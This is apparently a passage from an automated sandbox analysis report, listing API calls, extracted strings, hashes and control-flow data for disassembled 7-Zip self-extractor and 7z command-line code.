                                              • DeleteObject.GDI32(00000000), ref: 00407889
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                              • String ID:
                                              • API String ID: 1900162674-0
                                              • Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                              • Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
                                              • Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                              • Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55
                                              APIs
                                              • ScreenToClient.USER32(?,?), ref: 00408D3B
                                              • GetClientRect.USER32(?,?), ref: 00408D4D
                                              • PtInRect.USER32(?,?,?), ref: 00408D5C
                                                • Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771
                                              • CallNextHookEx.USER32(?,?,?), ref: 00408D7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ClientRect$CallHookKillNextScreenTimer
                                              • String ID:
                                              • API String ID: 3015594791-0
                                              • Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                              • Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
                                              • Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                              • Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19
                                              APIs
                                                • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040445E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404466
                                              • SetWindowTextW.USER32(?,?), ref: 00404473
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040447E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@TextWindow$Length
                                              • String ID:
                                              • API String ID: 2308334395-0
                                              • Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                              • Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
                                              • Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                              • Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94
                                              APIs
                                              • GetObjectW.GDI32(?,0000005C,?), ref: 00408094
                                              • CreateFontIndirectW.GDI32(?), ref: 004080AA
                                              • GetDlgItem.USER32(?,000004B5), ref: 004080BE
                                              • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: CreateFontIndirectItemMessageObjectSend
                                              • String ID:
                                              • API String ID: 2001801573-0
                                              • Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                              • Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
                                              • Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                              • Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
                                              • LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC
                                                • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT ref: 0040B824
                                                • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT ref: 0040B87C
                                                • Part of subcall function 0040B7A0: memmove.MSVCRT ref: 0040B899
                                                • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B8A6
                                                • Part of subcall function 0040B7A0: memmove.MSVCRT ref: 0040B8C4
                                                • Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D
                                                • Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT ref: 0040B937
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
                                              • String ID: $A$$A
                                              • API String ID: 2633840989-464203494
                                              • Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                              • Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
                                              • Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                              • Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE
                                              APIs
                                              • GetParent.USER32(?), ref: 00402088
                                              • GetWindowRect.USER32(?,?), ref: 004020A1
                                              • ScreenToClient.USER32(00000000,?), ref: 004020AF
                                              • ScreenToClient.USER32(00000000,?), ref: 004020B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ClientScreen$ParentRectWindow
                                              • String ID:
                                              • API String ID: 2099118873-0
                                              • Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                              • Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
                                              • Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                              • Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72
                                              APIs
                                                • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
                                                • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A
                                              • wsprintfW.USER32 ref: 00405364
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004053A1
                                              Strings
                                              • %X - %03X - %03X - %03X - %03X, xrefs: 0040535E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$??3@wsprintf
                                              • String ID: %X - %03X - %03X - %03X - %03X
                                              • API String ID: 1174869416-1993364030
                                              • Opcode ID: 967eb29cf2bee7a86009ecd14e1b84b7afee97ddefb494a1546e1a570999086d
                                              • Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
                                              • Opcode Fuzzy Hash: 967eb29cf2bee7a86009ecd14e1b84b7afee97ddefb494a1546e1a570999086d
                                              • Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@wsprintf
                                              • String ID: (%d%s)
                                              • API String ID: 3815514257-2087557067
                                              • Opcode ID: 6d96fd93464582cccd0b2bca5c0799422c7febacc937a75f3beb404c47778674
                                              • Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
                                              • Opcode Fuzzy Hash: 6d96fd93464582cccd0b2bca5c0799422c7febacc937a75f3beb404c47778674
                                              • Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98
                                              APIs
                                              • GetWindowTextLengthW.USER32(?), ref: 004033F1
                                              • GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: TextWindow$Length
                                              • String ID: j4@
                                              • API String ID: 1006428111-2012685699
                                              • Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                              • Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
                                              • Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                              • Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95
                                              APIs
                                              • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Message
                                              • String ID: 7-Zip SFX$Could not allocate memory
                                              • API String ID: 2030045667-3806377612
                                              • Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                              • Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
                                              • Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                              • Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                              • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                              • API String ID: 3442115484-272389550
                                              • Opcode ID: 7760baf1af826760d5cc902eb13af7624987e20b9658c42b93d7d9b3a1d12304
                                              • Instruction ID: af756758fb398c73b6ca926a11f016c1f2ca8d54790f8e38e2ad5c3aec97030b
                                              • Opcode Fuzzy Hash: 7760baf1af826760d5cc902eb13af7624987e20b9658c42b93d7d9b3a1d12304
                                              • Instruction Fuzzy Hash: 02725EB2204A8196DB34EB26E5903AE7761F785B85F40812BDF8A47B19DF3CC459CB48
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrowmallocmemmove
                                              • String ID:
                                              • API String ID: 3352498445-0
                                              • Opcode ID: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                              • Instruction ID: cbef2d6bc972eb84d3c1893fc9bc313adb167e877fc928a5415b3586a73935b9
                                              • Opcode Fuzzy Hash: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                              • Instruction Fuzzy Hash: BF824F32315AC185CA30EF26E5903ABA360F786795F408127DF8D57B5ADFACC949CB08

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1635 4747ac-47485c call 453314 * 2 1640 47485e-474884 call 452880 1635->1640 1641 47489a-47491b call 476344 call 4532bc call 453b5c free * 2 call 453208 call 453314 1635->1641 1640->1641 1646 474886-474895 call 453404 1640->1646 1656 474921-474925 1641->1656 1657 4749bd-4749cb call 45477c 1641->1657 1646->1641 1656->1657 1659 47492b-47495e call 453208 call 45449c 1656->1659 1662 4749d1-4749e7 1657->1662 1663 474dff 1657->1663 1676 4749b0-4749b8 free 1659->1676 1677 474960-47496f 1659->1677 1673 4749e9-474a28 free * 4 1662->1673 1674 474a68-474ad2 call 453208 * 3 1662->1674 1665 474e02-474e05 1663->1665 1668 474e07-474e1c call 452130 1665->1668 1669 474e40-474e45 1665->1669 1689 474e30 1668->1689 1690 474e1e-474e2e call 453314 1668->1690 1671 474e47-474e58 call 453518 1669->1671 1672 474e5d-474e62 call 4570c8 1669->1672 1694 474f2c-474f98 call 463f0c 1671->1694 1687 474e67-474e6a 1672->1687 1680 474a2a 1673->1680 1681 474a58-474a63 free 1673->1681 1719 474d30-474d3b 1674->1719 1720 474ad8-474adb 1674->1720 1676->1657 1683 474971-474978 1677->1683 1684 47497a-47498b 1677->1684 1688 474a2e-474a41 1680->1688 1692 47504a-475059 free 1681->1692 1683->1684 1691 474993-474996 1683->1691 1684->1691 1687->1694 1695 474e70-474eea GetLastError call 453518 call 45362c free * 4 1687->1695 1696 474a54-474a56 1688->1696 1697 474a43-474a4f free * 2 1688->1697 1700 474e33-474e3b call 45b8f0 1689->1700 1690->1700 1691->1676 1699 474998-4749ad call 453404 1691->1699 1701 47523b-47524e 1692->1701 1714 47505e-475062 1694->1714 1715 474f9e-474fa2 1694->1715 1729 474eec 1695->1729 1730 474f1a-474f27 free 1695->1730 1696->1681 1696->1688 1697->1696 1699->1676 1700->1669 1717 475064-47506c 1714->1717 1718 47506e 1714->1718 1715->1714 1721 474fa8-474fac 1715->1721 1717->1718 1723 475071-47507d 1717->1723 1718->1723 1726 474d41-474dae call 462a84 free * 4 1719->1726 1727 474df0-474dfd call 462a84 1719->1727 1724 474b24-474b3e call 47ec5c 1720->1724 1725 474add-474ae0 1720->1725 1721->1714 1728 474fb2-474fc7 call 4632e8 1721->1728 1732 475083-4750d1 1723->1732 1733 475152-47516d 1723->1733 1752 474b44 1724->1752 1753 474c9d-474cee call 462a84 free * 4 1724->1753 1725->1724 1734 474ae2-474aee 1725->1734 1796 474db0 1726->1796 1797 474dde-474deb free 1726->1797 1727->1665 1728->1714 1751 474fcd-47500d free * 4 1728->1751 1737 474ef0-474f03 1729->1737 1730->1692 1776 475143-475150 call 45ae2c 1732->1776 1777 4750d3-4750de 1732->1777 1749 475173 1733->1749 1739 474af0-474af7 1734->1739 1740 474b4c-474b50 1734->1740 1744 474f15-474f18 1737->1744 1745 474f05-474f10 free * 2 1737->1745 1739->1740 1750 474af9-474b14 call 47b290 1739->1750 1746 474b52-474b5a 1740->1746 1747 474b60-474b63 1740->1747 1744->1730 1744->1737 1745->1744 1746->1747 1754 474bf5-474bff 1746->1754 1755 474b65-474b80 call 454318 1747->1755 1756 474bc1-474bc4 1747->1756 1757 475175-47517b 1749->1757 1779 474c0a-474c5b call 462a84 free * 4 1750->1779 1780 474b1a-474b22 1750->1780 1760 47500f 1751->1760 1761 47503d-475048 free 1751->1761 1752->1740 1785 474cf0 1753->1785 1786 474d1e-474d2b free 1753->1786 1754->1720 1763 474c05 1754->1763 1793 474b87-474b9e 1755->1793 1794 474b82-474b85 1755->1794 1771 474bc6-474be1 call 4643fc 1756->1771 1772 474be3-474bf2 call 49c7d4 1756->1772 1766 475190-47519e call 491850 1757->1766 1767 47517d-475188 call 466cd0 1757->1767 1770 475013-475026 1760->1770 1761->1692 1763->1719 1791 4751a1-4751a6 1766->1791 1767->1766 1782 475038-47503b 1770->1782 1783 475028-475033 free * 2 1770->1783 1771->1754 1771->1772 1772->1754 1776->1757 1777->1776 1795 4750e0-4750e3 1777->1795 1810 474c5d 1779->1810 1811 474c8b-474c98 free 1779->1811 1780->1740 1782->1761 1782->1770 1783->1782 1792 474cf4-474d07 1785->1792 1786->1692 1808 4751b1-4751f1 free * 4 1791->1808 1809 4751a8-4751b0 call 466cd0 1791->1809 1799 474d19-474d1c 1792->1799 1800 474d09-474d14 free * 2 1792->1800 1803 474ba0-474ba8 1793->1803 1804 474baf-474bb3 1793->1804 1794->1756 1805 4750e5-4750e7 1795->1805 1806 475138-475140 1795->1806 1807 474db4-474dc7 1796->1807 1797->1692 1799->1786 1799->1792 1800->1799 1803->1756 1815 474baa-474bad 1803->1815 1804->1756 1816 474bb5-474bbd 1804->1816 1817 47512b-475136 1805->1817 1818 4750e9-4750eb 1805->1818 1806->1776 1819 474dd9-474ddc 1807->1819 1820 474dc9-474dd4 free * 2 1807->1820 1813 4751f3 1808->1813 1814 475221-475239 free * 2 1808->1814 1809->1808 1823 474c61-474c74 1810->1823 1811->1692 1822 4751f7-47520a 1813->1822 1814->1701 1815->1756 1816->1756 1817->1776 1824 47511f-475129 1818->1824 1825 4750ed-4750f0 1818->1825 1819->1797 1819->1807 1820->1819 1828 47521c-47521f 1822->1828 1829 47520c-475217 free * 2 1822->1829 1826 474c86-474c89 1823->1826 1827 474c76-474c81 free * 2 1823->1827 1824->1776 1830 475112-47511d 1825->1830 1831 4750f2-475111 _CxxThrowException 1825->1831 1826->1811 1826->1823 1827->1826 1828->1814 1828->1822 1829->1828 1830->1776 1831->1830
                                              APIs
                                              Strings
                                              • Can not create output directory: , xrefs: 00474E83
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove$ErrorExceptionLastThrow
                                              • String ID: Can not create output directory:
                                              • API String ID: 4159955631-3123869724
                                              • Opcode ID: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                              • Instruction ID: b9f00c374f85a7c9f24f46661adf4e23f2a0a1be0f70fec03a915c2a3722b4f6
                                              • Opcode Fuzzy Hash: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                              • Instruction Fuzzy Hash: 83426A23219AC192CA30EB26E5903AFA361F7C6785F449117DF8D47B1ADF6CC859CB08

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2037 475458-4754e2 2038 4754e4-4754f0 2037->2038 2039 4754f2-4754f6 2037->2039 2040 4754fe-475504 2038->2040 2039->2040 2041 4755ec-4755fd 2040->2041 2042 47550a 2040->2042 2044 475612-475615 2041->2044 2045 4755ff-47560a call 452130 2041->2045 2043 47550d-475538 call 457d28 call 453208 2042->2043 2059 47556c-47559c call 45b8f0 free 2043->2059 2060 47553a-47554c call 457ebc 2043->2060 2048 475617-47561f memset 2044->2048 2049 475624-475639 call 452130 2044->2049 2045->2044 2048->2049 2056 47563b-47563e call 463524 2049->2056 2057 475648 2049->2057 2066 475643-475646 2056->2066 2058 47564b-475656 2057->2058 2062 475662-4756d1 call 4743b0 2058->2062 2063 475658-475661 2058->2063 2059->2043 2070 4755a2 2059->2070 2068 475551-475554 2060->2068 2076 4756d3-4756e3 2062->2076 2077 4756fd-475715 2062->2077 2063->2062 2066->2058 2073 475556-475562 2068->2073 2074 4755a4-4755c7 _CxxThrowException 2068->2074 2070->2041 2075 4755c8-4755eb _CxxThrowException 2073->2075 2078 475564 2073->2078 2074->2075 2075->2041 2076->2077 2088 4756e5-4756f8 free 2076->2088 2079 475f1d-475f22 2077->2079 2080 47571b-47571e 2077->2080 2078->2059 2081 475f24-475f27 2079->2081 2082 475f29-475f3d 2079->2082 2084 475726-47572a 2080->2084 2081->2082 2087 475f8d-476002 free * 2 2081->2087 2094 475f54-475f67 2082->2094 2095 475f3f-475f52 free 2082->2095 2085 475c37-475c50 2084->2085 2086 475730-47575f call 457d28 call 453208 2084->2086 2085->2084 2090 475c56-475c5a 2085->2090 2103 475772-47577e call 457ebc 2086->2103 2104 475761-475770 2086->2104 2098 476004-476017 2087->2098 2099 475f7c-475f8b free 2088->2099 2090->2079 2094->2087 2105 475f69-475f7b free 2094->2105 2095->2099 2099->2098 2109 475783-475786 2103->2109 2106 47579e-4757b4 call 491544 2104->2106 2105->2099 2113 475c5f-475c80 free * 2 2106->2113 2114 4757ba-47586c call 474504 call 4742a8 call 4740c4 call 453404 call 484c00 2106->2114 2110 47578c-475798 2109->2110 2111 475ef9-475f1c _CxxThrowException 2109->2111 2110->2106 2110->2111 2111->2079 2113->2099 2126 47586e-475876 2114->2126 2127 47587d-475883 2114->2127 2128 475889-4758b3 call 491bc0 2126->2128 2129 475878 2126->2129 2127->2128 2130 475c85-475c9e free 2127->2130 2137 475d02-475d1e free 2128->2137 2138 4758b9-4758bc 2128->2138 2129->2127 2131 475ca0 2130->2131 2132 475cbe-475cfd free call 474610 free * 2 2130->2132 2134 475ca4-475cbc free 2131->2134 2132->2099 2134->2132 2134->2134 2139 475d20 2137->2139 2140 475d3e-475d7b free call 474610 free * 2 2137->2140 2141 4758c2-4758d3 2138->2141 2142 4759b1-4759bd 2138->2142 2148 475d24-475d3c free 2139->2148 2140->2099 2143 4758d5-475907 call 457d28 call 453208 call 457ebc 2141->2143 2144 475933 2141->2144 2146 4759c3-4759cd 2142->2146 2147 475a8e-475a93 2142->2147 2189 475924-475931 free 2143->2189 2190 475909-475915 2143->2190 2155 475936-47594f free 2144->2155 2152 475a95-475a9a 2146->2152 2153 4759d3-4759e1 2146->2153 2151 475aa1-475ab9 2147->2151 2148->2140 2148->2148 2159 475acc 2151->2159 2160 475abb-475ac3 2151->2160 2152->2151 2157 475a55-475a58 2153->2157 2158 4759e3-4759ed 2153->2158 2161 475951 2155->2161 2162 47596f-4759ac free call 474610 free 2155->2162 2168 475a9c 2157->2168 2169 475a5a-475a86 2157->2169 2164 4759f5-475a11 call 474434 2158->2164 2166 475acf-475b54 call 4747ac 2159->2166 2160->2159 2165 475ac5-475aca 2160->2165 2170 475955-47596d free 2161->2170 2162->2085 2183 475a13-475a15 